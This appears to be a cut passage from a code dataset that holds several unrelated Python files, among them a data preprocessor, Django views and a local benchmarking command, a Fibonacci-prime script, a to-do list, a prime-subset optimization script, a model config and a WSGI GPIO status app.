day_enc.transform(np.array(df[\"Day\"]).reshape(-1,1)).toarray()\n df[route_enc.categories_[0]] = 
route_enc.transform(np.array(df[\"Route\"]).reshape(-1,1)).toarray()\n df[dir_enc.categories_[0]] = dir_enc.transform(np.array(df[\"Direction\"]).reshape(-1,1)).toarray()\n df[part_enc.categories_[0]] = part_enc.transform(np.array(df[\"Part of Day\"]).reshape(-1,1)).toarray()\n\n df.drop(['Day', 'Route', 'Direction', 'Part of Day'], axis=1, inplace=True)\n return df\n\n\ndef min_gap_scaler(df):\n df[\"Min Gap\"] = (df[\"Min Gap\"]-min_gap_train_mean)/min_gap_train_std\n return df\n\ndef preprocessor(df):\n # This function does all the preprocessing\n selected_columns = ['Report Date', 'Route', 'Time', 'Day', 'Location', 'Direction',\n 'Min Delay', 'Min Gap']\n try:\n df = df[selected_columns]\n df = complete_cleaner(df)\n df = one_hot_encoder(df) # one hot encoder based on training samples\n df = min_gap_scaler(df) # feature scaler based on training sample\n print(\"------------------------\")\n if df.isnull().values.any():\n print(\"There are some null values\")\n else:\n print(\"Data is ready for testing\")\n return df\n except:\n print(\"The columns of the data are not matching and sufficient\")\n print(\"Provide proper data with the following headers : \", selected_columns)\n\n\n\n\n","sub_path":"Projects/Script/performance_preprocessor.py","file_name":"performance_preprocessor.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"239346486","text":"from django.shortcuts import render\nfrom .models import Destination\n\n# Create your views here.\ndef index(request):\n des1 = Destination()\n des1.name= 'Dhaka'\n des1.desc = 'Ugly'\n des1.img = 'destination_1.jpg'\n des1.price = 650\n des1.offer = False\n\n\n des2 = Destination()\n des2.name = 'Dha'\n des2.desc = 'Uly'\n des2.img = 'destination_2.jpg'\n des2.price = 60\n des2.offer = True\n\n des3 = Destination()\n des3.name = 'Dhak'\n des3.desc = 'Ugy'\n des3.img = 'destination_3.jpg'\n des3.price = 50\n des3.offer = False\n\n dests = [des1,des2,des3]\n\n\n return render(request, 'index.html', {'dests': dests})","sub_path":"teles/travello/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"471138691","text":"from subprocess import PIPE, Popen as popen\nimport re\n\nfrom django.core.management.base import BaseCommand\nimport django.utils.simplejson as json\n\nwget_bin = 'wget'\nwget_args = ['--output-document=-', '--quiet']\nwget_host = '127.0.0.1'\nwget_port = 8000\nwget_urls = [\n 'http://%s:%d/de/fhbrs/' % (wget_host, wget_port),\n 'http://%s:%d/en/fhbrs/' % (wget_host, wget_port),\n]\n\njson_re = re.compile('\\-\\-\\[\\[JSON(.+)JSON\\]\\]\\-\\-', re.DOTALL)\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n loops = 1\n if len(args) >= 1:\n loops = int(args[0])\n self.stdout.write(\"Analysing FHBRS-Application ...\\r\\n\")\n results = []\n for loop in xrange(loops):\n for wget_url in wget_urls:\n self.stdout.write(\"\\tFetching '%s' ...\\r\\n\" % (wget_url))\n wget_cmd = [wget_bin.strip()] + wget_args + [wget_url]\n wget_pipe = popen(wget_cmd, stdout=PIPE)\n wget_out = wget_pipe.stdout.read()\n json_match = json_re.search(wget_out)\n json_text = json_match.group(1).strip()\n result = json.loads(json_text)\n #self.stdout.write(\"\\tAnalyse-Result:\\r\\n\")\n #for key, value in result.iteritems():\n # self.stdout.write(\"\\t\\t%s: %s\\r\\n\" % (str(key), str(value)))\n results.append(result)\n 
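# all fetches collected; write a separator line, then report averages over the gathered results\n        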
self.stdout.write(\"\\r\\n\")\n        render_time_key = 'request-to-response-time'\n        render_times = [result[render_time_key] for result in results]\n        render_time_avg = sum(render_times) / len(render_times)\n        self.stdout.write(\"Analyse-Render-Time-Avg: %f\\r\\n\" % (render_time_avg))\n        sql_query_count_key = 'sql-query-count'\n        sql_query_counts = [result[sql_query_count_key] for result in results]\n        sql_query_count_avg = float(sum(sql_query_counts)) / len(sql_query_counts)\n        self.stdout.write(\"Analyse-SQL-Query-Count-Avg: %f\\r\\n\" % (sql_query_count_avg))\n        return","sub_path":"fhbrs/management/commands/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"525892636","text":"import math\r\ndef fibonacci(n):\r\n    if (n < 0):\r\n        return -1;\r\n    elif (n == 0 or n == 1):\r\n        return n;\r\n    else:\r\n        return fibonacci(n - 1) + fibonacci(n - 2);\r\n    \r\ndef isPrimeNumber(n):\r\n    if (n < 2):\r\n        return False;\r\n    squareRoot = int(math.sqrt(n));\r\n    for i in range(2, squareRoot + 1):\r\n        if (n % i == 0):\r\n            return False;\r\n    return True;\r\n    \r\nn = int(input(\"Enter a positive integer n = \"));\r\nprint (\"All Fibonacci numbers less than\", n, \"that are also prime:\");\r\ni = 0;\r\nfin = fibonacci(i);\r\nwhile(fin < n):\r\n    fin = fibonacci(i);\r\n    # the freshly computed fibonacci(i) may already have reached n, so re-check before printing\r\n    if (fin < n and isPrimeNumber(fin)):\r\n        print(fin)\r\n    i = i + 1;\r\n","sub_path":"4.18.py","file_name":"4.18.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"37087103","text":"tasks = []\n\nwhile True:\n    print(\"Insert the number corresponding to the action you want to perform:\")\n\n    print(\"\\t1. insert a new task;\")\n    print(\"\\t2. remove a task;\")\n    print(\"\\t3. show all the tasks;\")\n    print(\"\\t4. 
close the program.\")\n\n try:\n ans = int(input(\"Your choice: \"))\n if ans == 1:\n new_task = input(\"Insert the task to insert: \")\n tasks.append(new_task)\n print(\"Task inserted.\")\n elif ans == 2:\n del_task = input(\"Insert the task to remove: \")\n try:\n tasks.remove(del_task)\n print(\"Task removed.\")\n except ValueError:\n print(\"Task not present.\")\n elif ans == 3:\n print(\"Inserted tasks:\")\n for task in tasks:\n print(task)\n elif ans == 4:\n break\n else:\n print(\"Not a valid number!\")\n except ValueError:\n print(\"Not a number!\")\n","sub_path":"python-lab1/ex03.py","file_name":"ex03.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"52151627","text":"import os\r\n\r\n\r\n\r\n\r\nelement_threshold = 0.8\r\nrelation_threshold = 0.8\r\nrotated_relation_threshold=0.8\r\nsub_image_folder_for_ocr = r'/home/fei/Desktop/vis_results_old/temp_sub_images/'\r\n\r\n# train_task_id = '3T' + str(choice([1024, 1280, 1536, 1792, 2048]))\r\nmax_train_img_size = 736\r\ntrain_task_id = '3T' +str(max_train_img_size)\r\nDEBUG = True\r\n\r\n# train_task_id = '3T1500'\r\ninitial_epoch = 0\r\nepoch_num = 200\r\nlr = 1e-4\r\ndecay = 5e-5\r\n\r\n# clip_value = 0.5 # default 0.5, 0 means no clip\r\n\r\npatience = 40\r\nload_weights = True\r\nlambda_inside_score_loss = 3.0\r\nlambda_cls_loss = 3.0\r\nlambda_side_vertex_code_loss = 1.0\r\nlambda_side_vertex_coord_loss = 1.0\r\n\r\n\r\ntotal_img = 2516\r\nvalidation_split_ratio = 0.25\r\n\r\n# max_train_img_size = int(train_task_id[-4:])\r\nmax_predict_img_size = max_train_img_size # int(train_task_id[-4:]) # 2400\r\n\r\nassert max_train_img_size in [512, 736, 1024, 1280, 1536, 1792, 2048], \\\r\n 'max_train_img_size must in [1024, 1280, 1536, 1792, 2048]'\r\nif max_train_img_size == 512:\r\n batch_size = 10\r\nelif max_train_img_size == 736:\r\n batch_size = 8\r\nelif max_train_img_size == 1024:\r\n batch_size = 5\r\nelif max_train_img_size == 1280:\r\n batch_size = 4\r\nelif max_train_img_size == 1536:\r\n batch_size = 3\r\nelif max_train_img_size == 1792:\r\n batch_size = 2\r\nelse:\r\n batch_size = 1\r\n\r\nsteps_per_epoch = total_img * (1 - validation_split_ratio) // batch_size\r\nvalidation_steps = total_img * validation_split_ratio // batch_size\r\n\r\ntrain_data_dir = r'C:\\Users\\LSC-110\\Desktop\\pubmed'\r\norigin_image_dir_name = r'Images'\r\norigin_txt_dir_name = r'labels'\r\ntrain_image_dir_name = r'images_%s' % train_task_id\r\ntrain_label_dir_name = r'labels_%s' % train_task_id\r\nshow_gt_image_dir_name = r'show_gt_images_%s' % train_task_id\r\nshow_act_image_dir_name = r'show_act_images_%s' % train_task_id\r\nval_fname = 'val_%s.txt' % train_task_id\r\ntrain_fname = 'train_%s.txt' % train_task_id\r\n\r\n# in paper it's 0.3, maybe to large to this problem\r\nshrink_ratio = 0.2\r\n# pixels between 0.2 and 0.6 are side pixels\r\nshrink_side_ratio = 0.8\r\nepsilon = 1e-4\r\n\r\nnum_channels = 3\r\nfeature_layers_range = range(5, 0, -1)\r\n\r\n# feature_layers_range = range(3, 0, -1)\r\nfeature_layers_num = len(feature_layers_range)\r\n# pixel_size = 4\r\npixel_size = 2 ** feature_layers_range[-1]\r\n\r\nlocked_layers = True\r\n\r\nif not os.path.exists('saved_models'):\r\n os.mkdir('saved_models')\r\n\r\nsaved_model_weights_file_path = r'saved_models\\model_weights.h5'\r\n\r\ntext_pixel_threshold = 0.8 # text foreground & background score\r\naction_pixel_threshold = 0.8 # relation foreground & background 
score\r\ntext_side_vertex_pixel_threshold = 0.85\r\naction_side_vertex_pixel_threshold = 0.85\r\ntext_trunc_threshold = 0.2\r\nnock_trunc_threshold = 0.05\r\narrow_trunc_threshold = 0.9\r\n\r\npredict_cut_text_line = False\r\npredict_write2txt = True\r\ncrop_width = 736\r\ncrop_height = 736\r\n\r\n# OCR configurations\r\ntest_home_folder = r'C:\\Users\\hefe\\Desktop\\use case' # home folder\r\nimage_folder = os.path.join(test_home_folder, \"images\")\r\nground_truth_folder = image_folder\r\npredict_folder = os.path.join(test_home_folder, \"predict\")\r\nfailed_folder = os.path.join(test_home_folder, \"failed\")\r\nprevious_dictionary_path = '' # none if not needed\r\n\r\nlog_file = os.path.join(predict_folder, \"log.txt\")\r\n# dictionary_path = os.path.join(predict_folder, \"gene_dictionary.xlsx\")\r\ndictionary_path = r\"./all_gene_names.json\"\r\nword_file = os.path.join(predict_folder, \"word_cloud.txt\") # word cloud\r\nall_results_file = os.path.join(predict_folder, \"all_results.txt\")\r\n\r\nOCR_hist_step_size = 15 # should perfectly divide 255\r\nOCR_hist_num_steps = 3 # num of steps to check\r\nOCR_hist_num_sub_steps = 3 # should perfectly divide step size\r\n#sub_step = step_size / num_sub_steps\r\n\r\ncandidate_threshold = 20 # do not show corrected_results if fuzz_ratio < candidate_threshold\r\nthreshold = 70 # do not proceed to next range unless best_fuzz_ratio > threshold\r\nearly_stop_threshold = 100 # for patience\r\n\r\npatience_2 = 10 # stop if x consecutive bests >= threshold\r\npatience = 3 # stop if x bests >= early_stop_threshold\r\n\r\nvertical_ratio_thresh = 1.5 # rotate 90c and 90cc if height / width >= vertical_ratio_thresh\r\ndetection_IoU_thresholds = [.1, .25, .5, .75] # threshold for evaluation\r\n\r\npadding = 50 # for deskew\r\nOCR_SCALE = 5 # for resizing image\r\nOCR_OFFSET = 0\r\n\r\n# relationship configuration\r\nrelationship_model = r'saved_models\\bottleneck_fc_model11.h5'\r\nsub_img_width_for_relation_predict = 196\r\nsub_img_height_for_relation_predict = 140\r\n# relationship_folder = os.path.join(test_home_folder, \"relationship\")\r\n# testing_data_folder = os.path.join(relationship_folder, \"test\")\r\n#not_classified_folder = os.path.join(test_home_folder, \"not_classified\")\r\n\r\n#different threshold configuration\r\nthreshold_start_point = 0.6\r\nthreshold_end_point = 0.99\r\nthreshold_step = 0.1\r\n# end of file\r\n","sub_path":"cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"313280162","text":"from django.urls import path, include\nfrom rest_framework import routers\n\nfrom tv_series import views\n\nrouter = routers.DefaultRouter(trailing_slash=False)\nrouter.register(r'shows', views.ShowViewSet)\nrouter.register(r'episodes', views.EpisodeViewSet)\nrouter.register(r'genres', views.GenreViewSet)\n\nurlpatterns = [\n path('api/', include(router.urls)),\n]\n","sub_path":"backend/tv_series/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"72585510","text":"import logging\nimport re\n\nfrom streamlink.plugin import Plugin, PluginArgument, PluginArguments\nfrom streamlink.stream import HLSStream\nfrom streamlink.utils import parse_json\n\nlog = logging.getLogger(__name__)\n\nclass ElementalTv(Plugin):\n '''\n Support for Icelandic live channels streams on ruv.is\n '''\n API_GET_STREAM_URL = 
'https://geo.spilari.ruv.is/channel/%s'\n \n url_re = re.compile(r'https?://(www\\.)?ruv\\.is/(sjon|ut)varp/beint(/\\w+|\\?channel=\\w+)')\n\n @classmethod\n def can_handle_url(cls, url):\n return cls.url_re.match(url) is not None\n\n def get_stream_url(self, channel_id):\n error_message = None\n url = self.API_GET_STREAM_URL % channel_id\n\n try:\n log.trace('API URL: {}', url)\n res_api = self.session.http.get(url)\n log.trace('API Response: {}', res_api.text)\n api_json = parse_json(res_api.text)\n\n if api_json.get('url'):\n return api_json.get('url')\n \n if api_json.get('message'):\n error_message = api_json.get('message')\n\n except:\n pass\n\n log.trace('Could not get stream URL')\n\n if error_message:\n log.trace('Error: {}', error_message)\n\n return None\n\n def get_channel_id(self):\n # If \"...channel=channel_id\" type URL\n arr = self.url.split('channel=')\n\n if len(arr) >= 2:\n return re.split(r'/|#|\\?|\\&', arr[1])[0]\n\n # if \".../beint/channel_id\" type URL\n url_parts = re.split(r'/|#|\\?', self.url)\n\n if len(url_parts) < 6:\n return None\n\n return url_parts[5]\n\n def _get_streams(self):\n # Get channel ID\n channel_id = None\n channel_id = self.get_channel_id()\n\n if not channel_id:\n log.debug('Channel ID not found')\n return\n\n log.trace('Channel ID: {}', channel_id)\n\n stream_url = self.get_stream_url(channel_id)\n\n if not stream_url:\n log.error('Could not get stream URL')\n return\n\n log.trace('Stream URL: {}', stream_url)\n\n streams = HLSStream.parse_variant_playlist(self.session, stream_url)\n\n if not streams:\n log.debug('Play whole m3u8 file')\n yield 'live', HLSStream(self.session, stream_url)\n else:\n log.debug('Play single stream')\n for s in streams.items():\n yield s\n\n\n__plugin__ = ElementalTv\n","sub_path":"ruv_is.py","file_name":"ruv_is.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"415044012","text":"import os\nimport numpy as np\n\nfrom models.models import CatBoost, kNN, ANNClassifier, LogRegression\nfrom log.plot import (plot_confusion_matrix, probability_threshold,\n regression_coefficients)\nfrom settings import MODELS_PATH, CLASSES\n\n\n\nclass ModelFactory:\n _single_models = {\n 'kNN': kNN,\n 'ANN': ANNClassifier,\n 'CatBoost': CatBoost,\n }\n @classmethod\n def get(cls, model_name):\n return cls._single_models[model_name]\n\n\n\n\nclass Ensemble:\n def __init__(self):\n self.out_of_fold_predictions = {'valid': [], 'test': []}\n self.single_models = []\n self.single_models_classes = []\n\n def single_model(self, model_name, model_id, num_input_features, num_output_classes, model_save_path, **aux_params):\n model = ModelFactory.get(model_name)\n return model(model_id, num_input_features, num_output_classes, model_save_path, **aux_params)\n\n def meta_model(self, model_id, model_save_path):\n return LogRegression(model_id, model_save_path)\n\n\n def iteration(self, model_name, model_id, X, y, classes, features,\n model_save_path, features_short=None, additinal_labels=False, **aux_params):\n num_input_features = len(features)\n num_output_classes = len(classes)\n\n model = self.single_model(model_name, model_id, num_input_features, num_output_classes, model_save_path, **aux_params)\n model.fit(X['train'], y['train'], X['valid'], y['valid'])\n if additinal_labels:\n preds_add = np.squeeze(model.predict(X['add']))\n agreed_filter = y['add'].to_numpy() == np.argmax(preds_add, axis=-1)\n X_add_agreed = X['add'][agreed_filter]\n 
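# agreement filter: keep only the extra samples whose given labels match the model's own predictions\n            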
y_add_agreed = y['add'][agreed_filter]\n\n X_train = X['train'].append(X_add_agreed, ignore_index=True)\n y_train = y['train'].append(y_add_agreed, ignore_index=True)\n model.fit(X_train, y_train, X['valid'], y['valid'])\n model.load()\n if features_short is not None:\n model.explain(X['train'], y['train'], features_short, classes)\n else:\n model.explain(X['test'], y['train'], features, classes)\n\n self.out_of_fold_predictions['valid'].append(model.predict(X['valid']))\n self.out_of_fold_predictions['test'].append(model.predict(X['test']))\n\n self.log_iteration_results(model, y['test'], model.predict(X['test']), classes)\n self.single_models.append(model_id)\n self.single_models_classes.append(classes)\n\n\n def stacked_iteration(self, model_id, y, model_save_path):\n metamodel = self.meta_model(model_id, model_save_path)\n stacked_val_predictions = np.hstack(self.out_of_fold_predictions['valid'])\n stacked_test_predictions = np.hstack(self.out_of_fold_predictions['test'])\n metamodel.fit(stacked_val_predictions, y['valid'])\n\n self.log_stacking_results(metamodel, y['test'],\n metamodel.predict(stacked_test_predictions))\n\n def log_iteration_results(self, model, labels, predictions, classes=CLASSES):\n save_path = model.model_path\n plot_confusion_matrix(labels, predictions, classes, model.model_id, save_path=save_path)\n probability_threshold(labels, predictions, save_path=save_path)\n\n def log_stacking_results(self, model, labels, predictions, classes=CLASSES):\n self.log_iteration_results(model, labels, predictions, classes)\n regression_coefficients(model, self.single_models,\n self.single_models_classes,\n model.model_path, classes=CLASSES)\n","sub_path":"classification/models/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"289538198","text":"import math\n\ntask = \"6\"\n\n# edit to the name of the input file\nf = open('uniqueproducts'+ task + '.txt', 'r')\nn,m = map(int, f.readline().strip().split())\nsubsets = []\n# replace from here to line 10 with your own logic\n# variables available are just n and m, which are as described in the problem\n\nall_primes = set([2,3])\nall_not_primes = set([])\n\ndef is_prime(n):\n if n in all_primes: return True\n if n in all_not_primes: return False\n if n < 2 or n%2 == 0: \n all_not_primes.add(n)\n return False\n if n < 9: \n all_primes.add(n)\n return True\n if n%3 == 0: \n all_not_primes.add(n)\n return False\n r = int(n**0.5)\n # since all primes > 3 are of the form 6n ± 1\n # start with f=5 (which is prime)\n # and test f, f+2 for being prime\n # then loop by 6. 
\n f = 5\n while f <= r:\n #print('\\t',f)\n if n % f == 0: \n all_not_primes.add(n)\n return False\n if n % (f+2) == 0: \n all_not_primes.add(n)\n return False\n f += 6\n all_primes.add(n)\n return True \n\n# https://stackoverflow.com/questions/16007204/factorizing-a-number-in-python\n# f = lambda n: (p:=[next(i for i in range(2, n+1) if n % i == 0)] if n>1 else [])+(f(n//p[0]) if p else [])\n\ndef f(n):\n if n <= 1:\n return []\n p = []\n i = 2\n while n > 1:\n if n % i == 0 and is_prime(i):\n p.append(i)\n n = n // i\n else:\n if i == 2:\n i += 1\n else:\n i += 2\n return p \n\n# get prime numbers\nprimes = []\nnot_primes = []\nfor i in range(2, m):\n if is_prime(i):\n primes.append(i)\n else:\n not_primes.append(i)\nprint(primes)\nnum_primes = len(primes)\nprint(\"there are\",num_primes,\"primes\")\n\n# start by adding 1 to each set\n\ncounter = 0\n\n# FIXME: it's just broken lol\n# if task == \"4\":\n# subsets.append([1,2,61,67,71,73,79,83,89])\n# subsets.append([1,3,13,17,29,31,41,47,59])\n# subsets.append([1,5,7 ,11,19,23,37,43,53]) #41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89\n# counter = 8\n# elif task == \"5\":\n# subsets.append([1,2,101,103,107,109,113,127,131])\n# subsets.append([1,3,47 ,53 ,59 ,61 ,67 ,79 ,89])\n# subsets.append([1,5,29 ,31 ,37 ,41 ,23 ,71 ,83])\n# subsets.append([1,7,11 ,13 ,17 ,19 ,43 ,73 ,97]) #97, 101, 103, 107, 109, 113, 127, 131\n# counter = 8\n# elif task == \"1\" or task == \"2\" or task == \"3\":\n# # subsets.append([1,2,19,13,17])\n# # subsets.append([1,3,5 ,7 ,11])\n# # subsets.append([1,2,3,73,79,83,89,97,101,103,107,109,113,127,131,133,137,139,149])\n# # subsets.append([1,5,7,11,13,17,19,23,29 ,31 ,37 ,41 ,43 ,47 ,53 ,59 ,61 ,67 ,71])\n# subsets.append([1,2,5])\n# subsets.append([1,3,7])\n# start = 12 #task 2: 35\n# subsets[0] = subsets[0] + primes[4+start:4+2*start]\n# subsets[1] = subsets[1] + primes[4:4+start]\n# #print(len(subsets[0]), (len(subsets[1])))\n# counter = len(subsets[0]) - 1\n\n# for i in range(n):\n# subsets.append([1])\n# subsets.append([1,2,5,7,11,13,17,19]) \n# subsets.append([1,3,23,29,31,37,41,43,47,53]) \n# subsets.append([1,2,5,7,11,13]) \n# subsets.append([1,3,17,19,23,29,31,37,41,43,47,53]) \n\nif task == \"1\":\n subsets.append([1,2, 53,59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397]) \n subsets.append([1,3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47])\nif task == \"2\":\n start = 38\n subsets.append([1,2] + primes[start:])\n subsets.append([1] + primes[1:start])\nif task == \"3\":\n start = 83\n subsets.append([1,2] + primes[start:])\n subsets.append([1] + primes[1:start])\nif task == \"4\":\n pre = 3\n start = 211\n pre_start = 26\n subsets.append([1,2] + primes[start:])\n subsets.append([1,3] + primes[pre_start:start])\n subsets.append([1,5] + primes[pre:pre_start])\nif task == \"5\":\n pre = 4\n pre_start = 15\n pre_start2 = 53\n start = 105\n \n subsets.append([1,2] + primes[start:])\n subsets.append([1,3] + primes[pre_start2:start])\n subsets.append([1,5] + primes[pre_start:pre_start2])\n subsets.append([1,7] + primes[pre:pre_start])\n # del primes[0]\n # step = 2\n # counter = 0\n # while (counter + 1) * (step) <= start:\n # j = 0\n # # alternate the direction we add the numbers\n # if counter % 4 == 0 or counter % 4 == 3:\n # r = range(1,3)\n # else:\n # r 
= range(2, 0, -1)\n # for i in r:\n # # print(counter * step + j)\n # subsets[i].append(primes[counter * step + j])\n # j += 1\n # counter += 1\n\n#primes = sorted(primes, reverse=True)\n\n# add prime numbers intelligently\n# p_i = 16\n# while p_i < len(primes) - 0:\n# p = primes[p_i]\n# #print(\"old\")\n# composites = []\n# for s in subsets:\n# current_composites = 0\n# for c in not_primes:\n# factors = f(c)\n# unique = True\n# located = False\n# first = factors[0]\n# if first in s:\n# located = s\n# else:\n# continue\n# #print(first,located)\n# for k in range(1,len(factors)):\n# if not factors[k] in s:\n# #print(k,\"not in\",located)\n# unique = False\n# break\n# if unique:\n# current_composites += 1\n# #print(c)\n# composites.append(len(s) + current_composites)\n# #print(\"new\")\n# new_composites = []\n# for s_i in range(len(subsets)):\n# subsets[s_i].append(p)\n# #print(s_i,p)\n# current_composites = 0\n# for c in not_primes:\n# factors = f(c)\n# unique = True\n# first = factors[0]\n# if not first in subsets[s_i]:\n# continue\n# #print(first,located)\n# for k in range(1,len(factors)):\n# if not factors[k] in subsets[s_i]:\n# #print(k,\"not in\",located)\n# unique = False\n# break\n# if unique:\n# current_composites += 1\n# #print(c)\n# #print(current_composites)\n# new_composites.append(len(subsets[s_i]) + current_composites)\n# del subsets[s_i][-1]\n \n# # for task 1,2,3 only for now\n# # if p_i < 5:\n# # if (abs(composites[0] - new_composites[1]) > abs(composites[1] - new_composites[0])):\n# # subsets[1].append(p)\n# # else:\n# # subsets[0].append(p)\n# if (abs(composites[0] - new_composites[1]) < abs(composites[1] - new_composites[0])):\n# subsets[1].append(p)\n# else:\n# subsets[0].append(p)\n# print(p,composites,new_composites)\n# p_i += 1\n # p_i += 2\n # if p_i >= len(primes):\n # if p_i % 2 == 0:\n # p_i = 1\n # else:\n # break\n\n\n# add prime numbers\n# step = n\n# while (counter + 1) * (step) <= num_primes:\n# j = 0\n# # alternate the direction we add the numbers\n# if counter == 0 or ((task == \"1\" or task == \"2\" or task == \"3\") and (counter % 4 == 0 or counter % 4 == 3)):\n# r = range(len(subsets))\n# else:\n# r = range(len(subsets) - 1, -1, -1)\n# for i in r:\n# # print(counter * step + j)\n# subsets[i].append(primes[counter * step + j])\n# j += 1\n# counter += 1\n\nfor i in subsets:\n print(\"len\",len(i))\n\nleftovers = []\n\n# add composite numbers to subsets\nfor i in not_primes:\n factors = f(i)\n unique = True\n located = []\n first = factors[0]\n for j in range(len(subsets)):\n if first in subsets[j]:\n located = j\n #print(first,located)\n for k in range(1,len(factors)):\n if not factors[k] in subsets[located]:\n #print(k,\"not in\",located)\n unique = False\n leftovers.append(i)\n break\n if unique:\n subsets[located].append(i)\n #print(\"unique\")\n\n#print(leftovers)\n\n# def get_products(subs):\n# if len(subs) == 2:\n# products = []\n# for i in subs[0]:\n# for j in subs[1]:\n# products.append(i * j)\n# return products\n# else:\n# prev_products = get_products(subs[1:])\n# new_products = []\n# for i in subs[0]:\n# for j in prev_products:\n# new_products.append(i * j)\n# return new_products\n\n\n# for i in leftovers:\n# for sub_i in range(len(subsets)):\n# subsets[sub_i].append(i)\n# p = get_products(subsets)\n# p_set = set(p)\n# if len(p) != len(p_set):\n# del subsets[sub_i][-1] # contains duplicates\n# print(i,\"contains duplicates\")\n\nmin_len = m\ntotal_len = 0\nfor i in subsets:\n print(\"len\",len(i))\n total_len += len(i)\n if len(i) < min_len:\n 
min_len = len(i)\nprint(total_len)\n\nfor i in range(len(subsets)):\n subsets[i] = subsets[i][:min_len]\n\n# print()\n# assert len({len(i) for i in subsets}) == 1, \"Subsets are not of equal size\"\n\n#delete the last number in the output\n\n# change to whatever you want your output file to be called\nout = open('output'+ task + '.txt', 'w')\nfor s in subsets:\n for i in range(len(s)):\n out.write(str(s[i])+\" \")\n out.write(\"\\n\")\nout.close()","sub_path":"cmimcoptimization1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"515423990","text":"import os\nimport math\n\n\ncellSize = {\n\t0: \"Minuscule\",\n\t1: \"Tiny\",\n\t2: \"Small\",\n\t3: \"Medium\",\n\t4: \"Big\",\n\t5: \"Huge\",\n\t6: \"Gigantic\",\n\t7: \"Colossal\"\n}\n\nfor filename in os.listdir(\".\"):\n\tif filename.startswith(\"CancerCellsGreyedOut_\"):\n\t\tcellNum = int(filename[33:-4])\n\t\tos.rename(filename, \"Grey \" + cellSize[cellNum] + \" Cell.png\")","sub_path":"assets/RenameSprites.py","file_name":"RenameSprites.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"353946746","text":"import requests as request\n\nclass jsonSchemaTest():\n def apiTest(self):\n response = request.get(\"http://json-schema.org/draft-04/schema#\")\n #print(response.status_code)\n jsonData = response.json()\n #print(jsonData)\n for key, value in jsonData.items():\n if key == \"dependencies\":\n print(value)\n\n\nobj = jsonSchemaTest()\nobj.apiTest()","sub_path":"JsonSchemaOrg.py","file_name":"JsonSchemaOrg.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"582775721","text":"# Set() function returns a set of all the unique characters.\n# So just compare the length of the String with the length of the Set \n\ns1=\"unique\"\ns2=\"bear\"\n\n\ndef _isUnique(s):\n if(len(s)==len(set(s))):\n return \"YES\"\n else:\n return \"NO\"\nprint (_isUnique(s2))\n","sub_path":"pythonSolutions/arraysAndStrings/isUnique.py","file_name":"isUnique.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"92139137","text":"def application(environ, start_response):\n\n import cgi\n import json\n\n import os,sys,inspect\n\n # Set top folder to allow import of modules\n\n top_folder = os.path.split(os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0])))[0]\n if top_folder not in sys.path:\n sys.path.insert(0,top_folder)\n\n from cupid.pilib import sqlitedatadump\n\n post_env = environ.copy()\n post_env['QUERY_STRING'] = ''\n post = cgi.FieldStorage(\n fp=environ['wsgi.input'],\n environ=post_env,\n keep_blank_values=True\n )\n\n formname=post.getvalue('name')\n data={}\n d = {}\n for k in post.keys():\n d[k] = post.getvalue(k)\n\n status = '200 OK'\n\n # Get GPIO status\n # We return this status no matter what\n\n gpiolist = [18,23,24,25,4,17,21,22]\n import cupid.pilib as pilib\n inputs = pilib.readalldbrows(pilib.controldatabase, 'inputs')\n interfaces = pilib.readalldbrows(pilib.controldatabase, 'interfaces')\n\n statusdict={}\n for input in inputs:\n statusdict[input['id'] + 'value'] = input['value']\n for interface in interfaces:\n if interface['type'] == 'GPIO':\n options = 
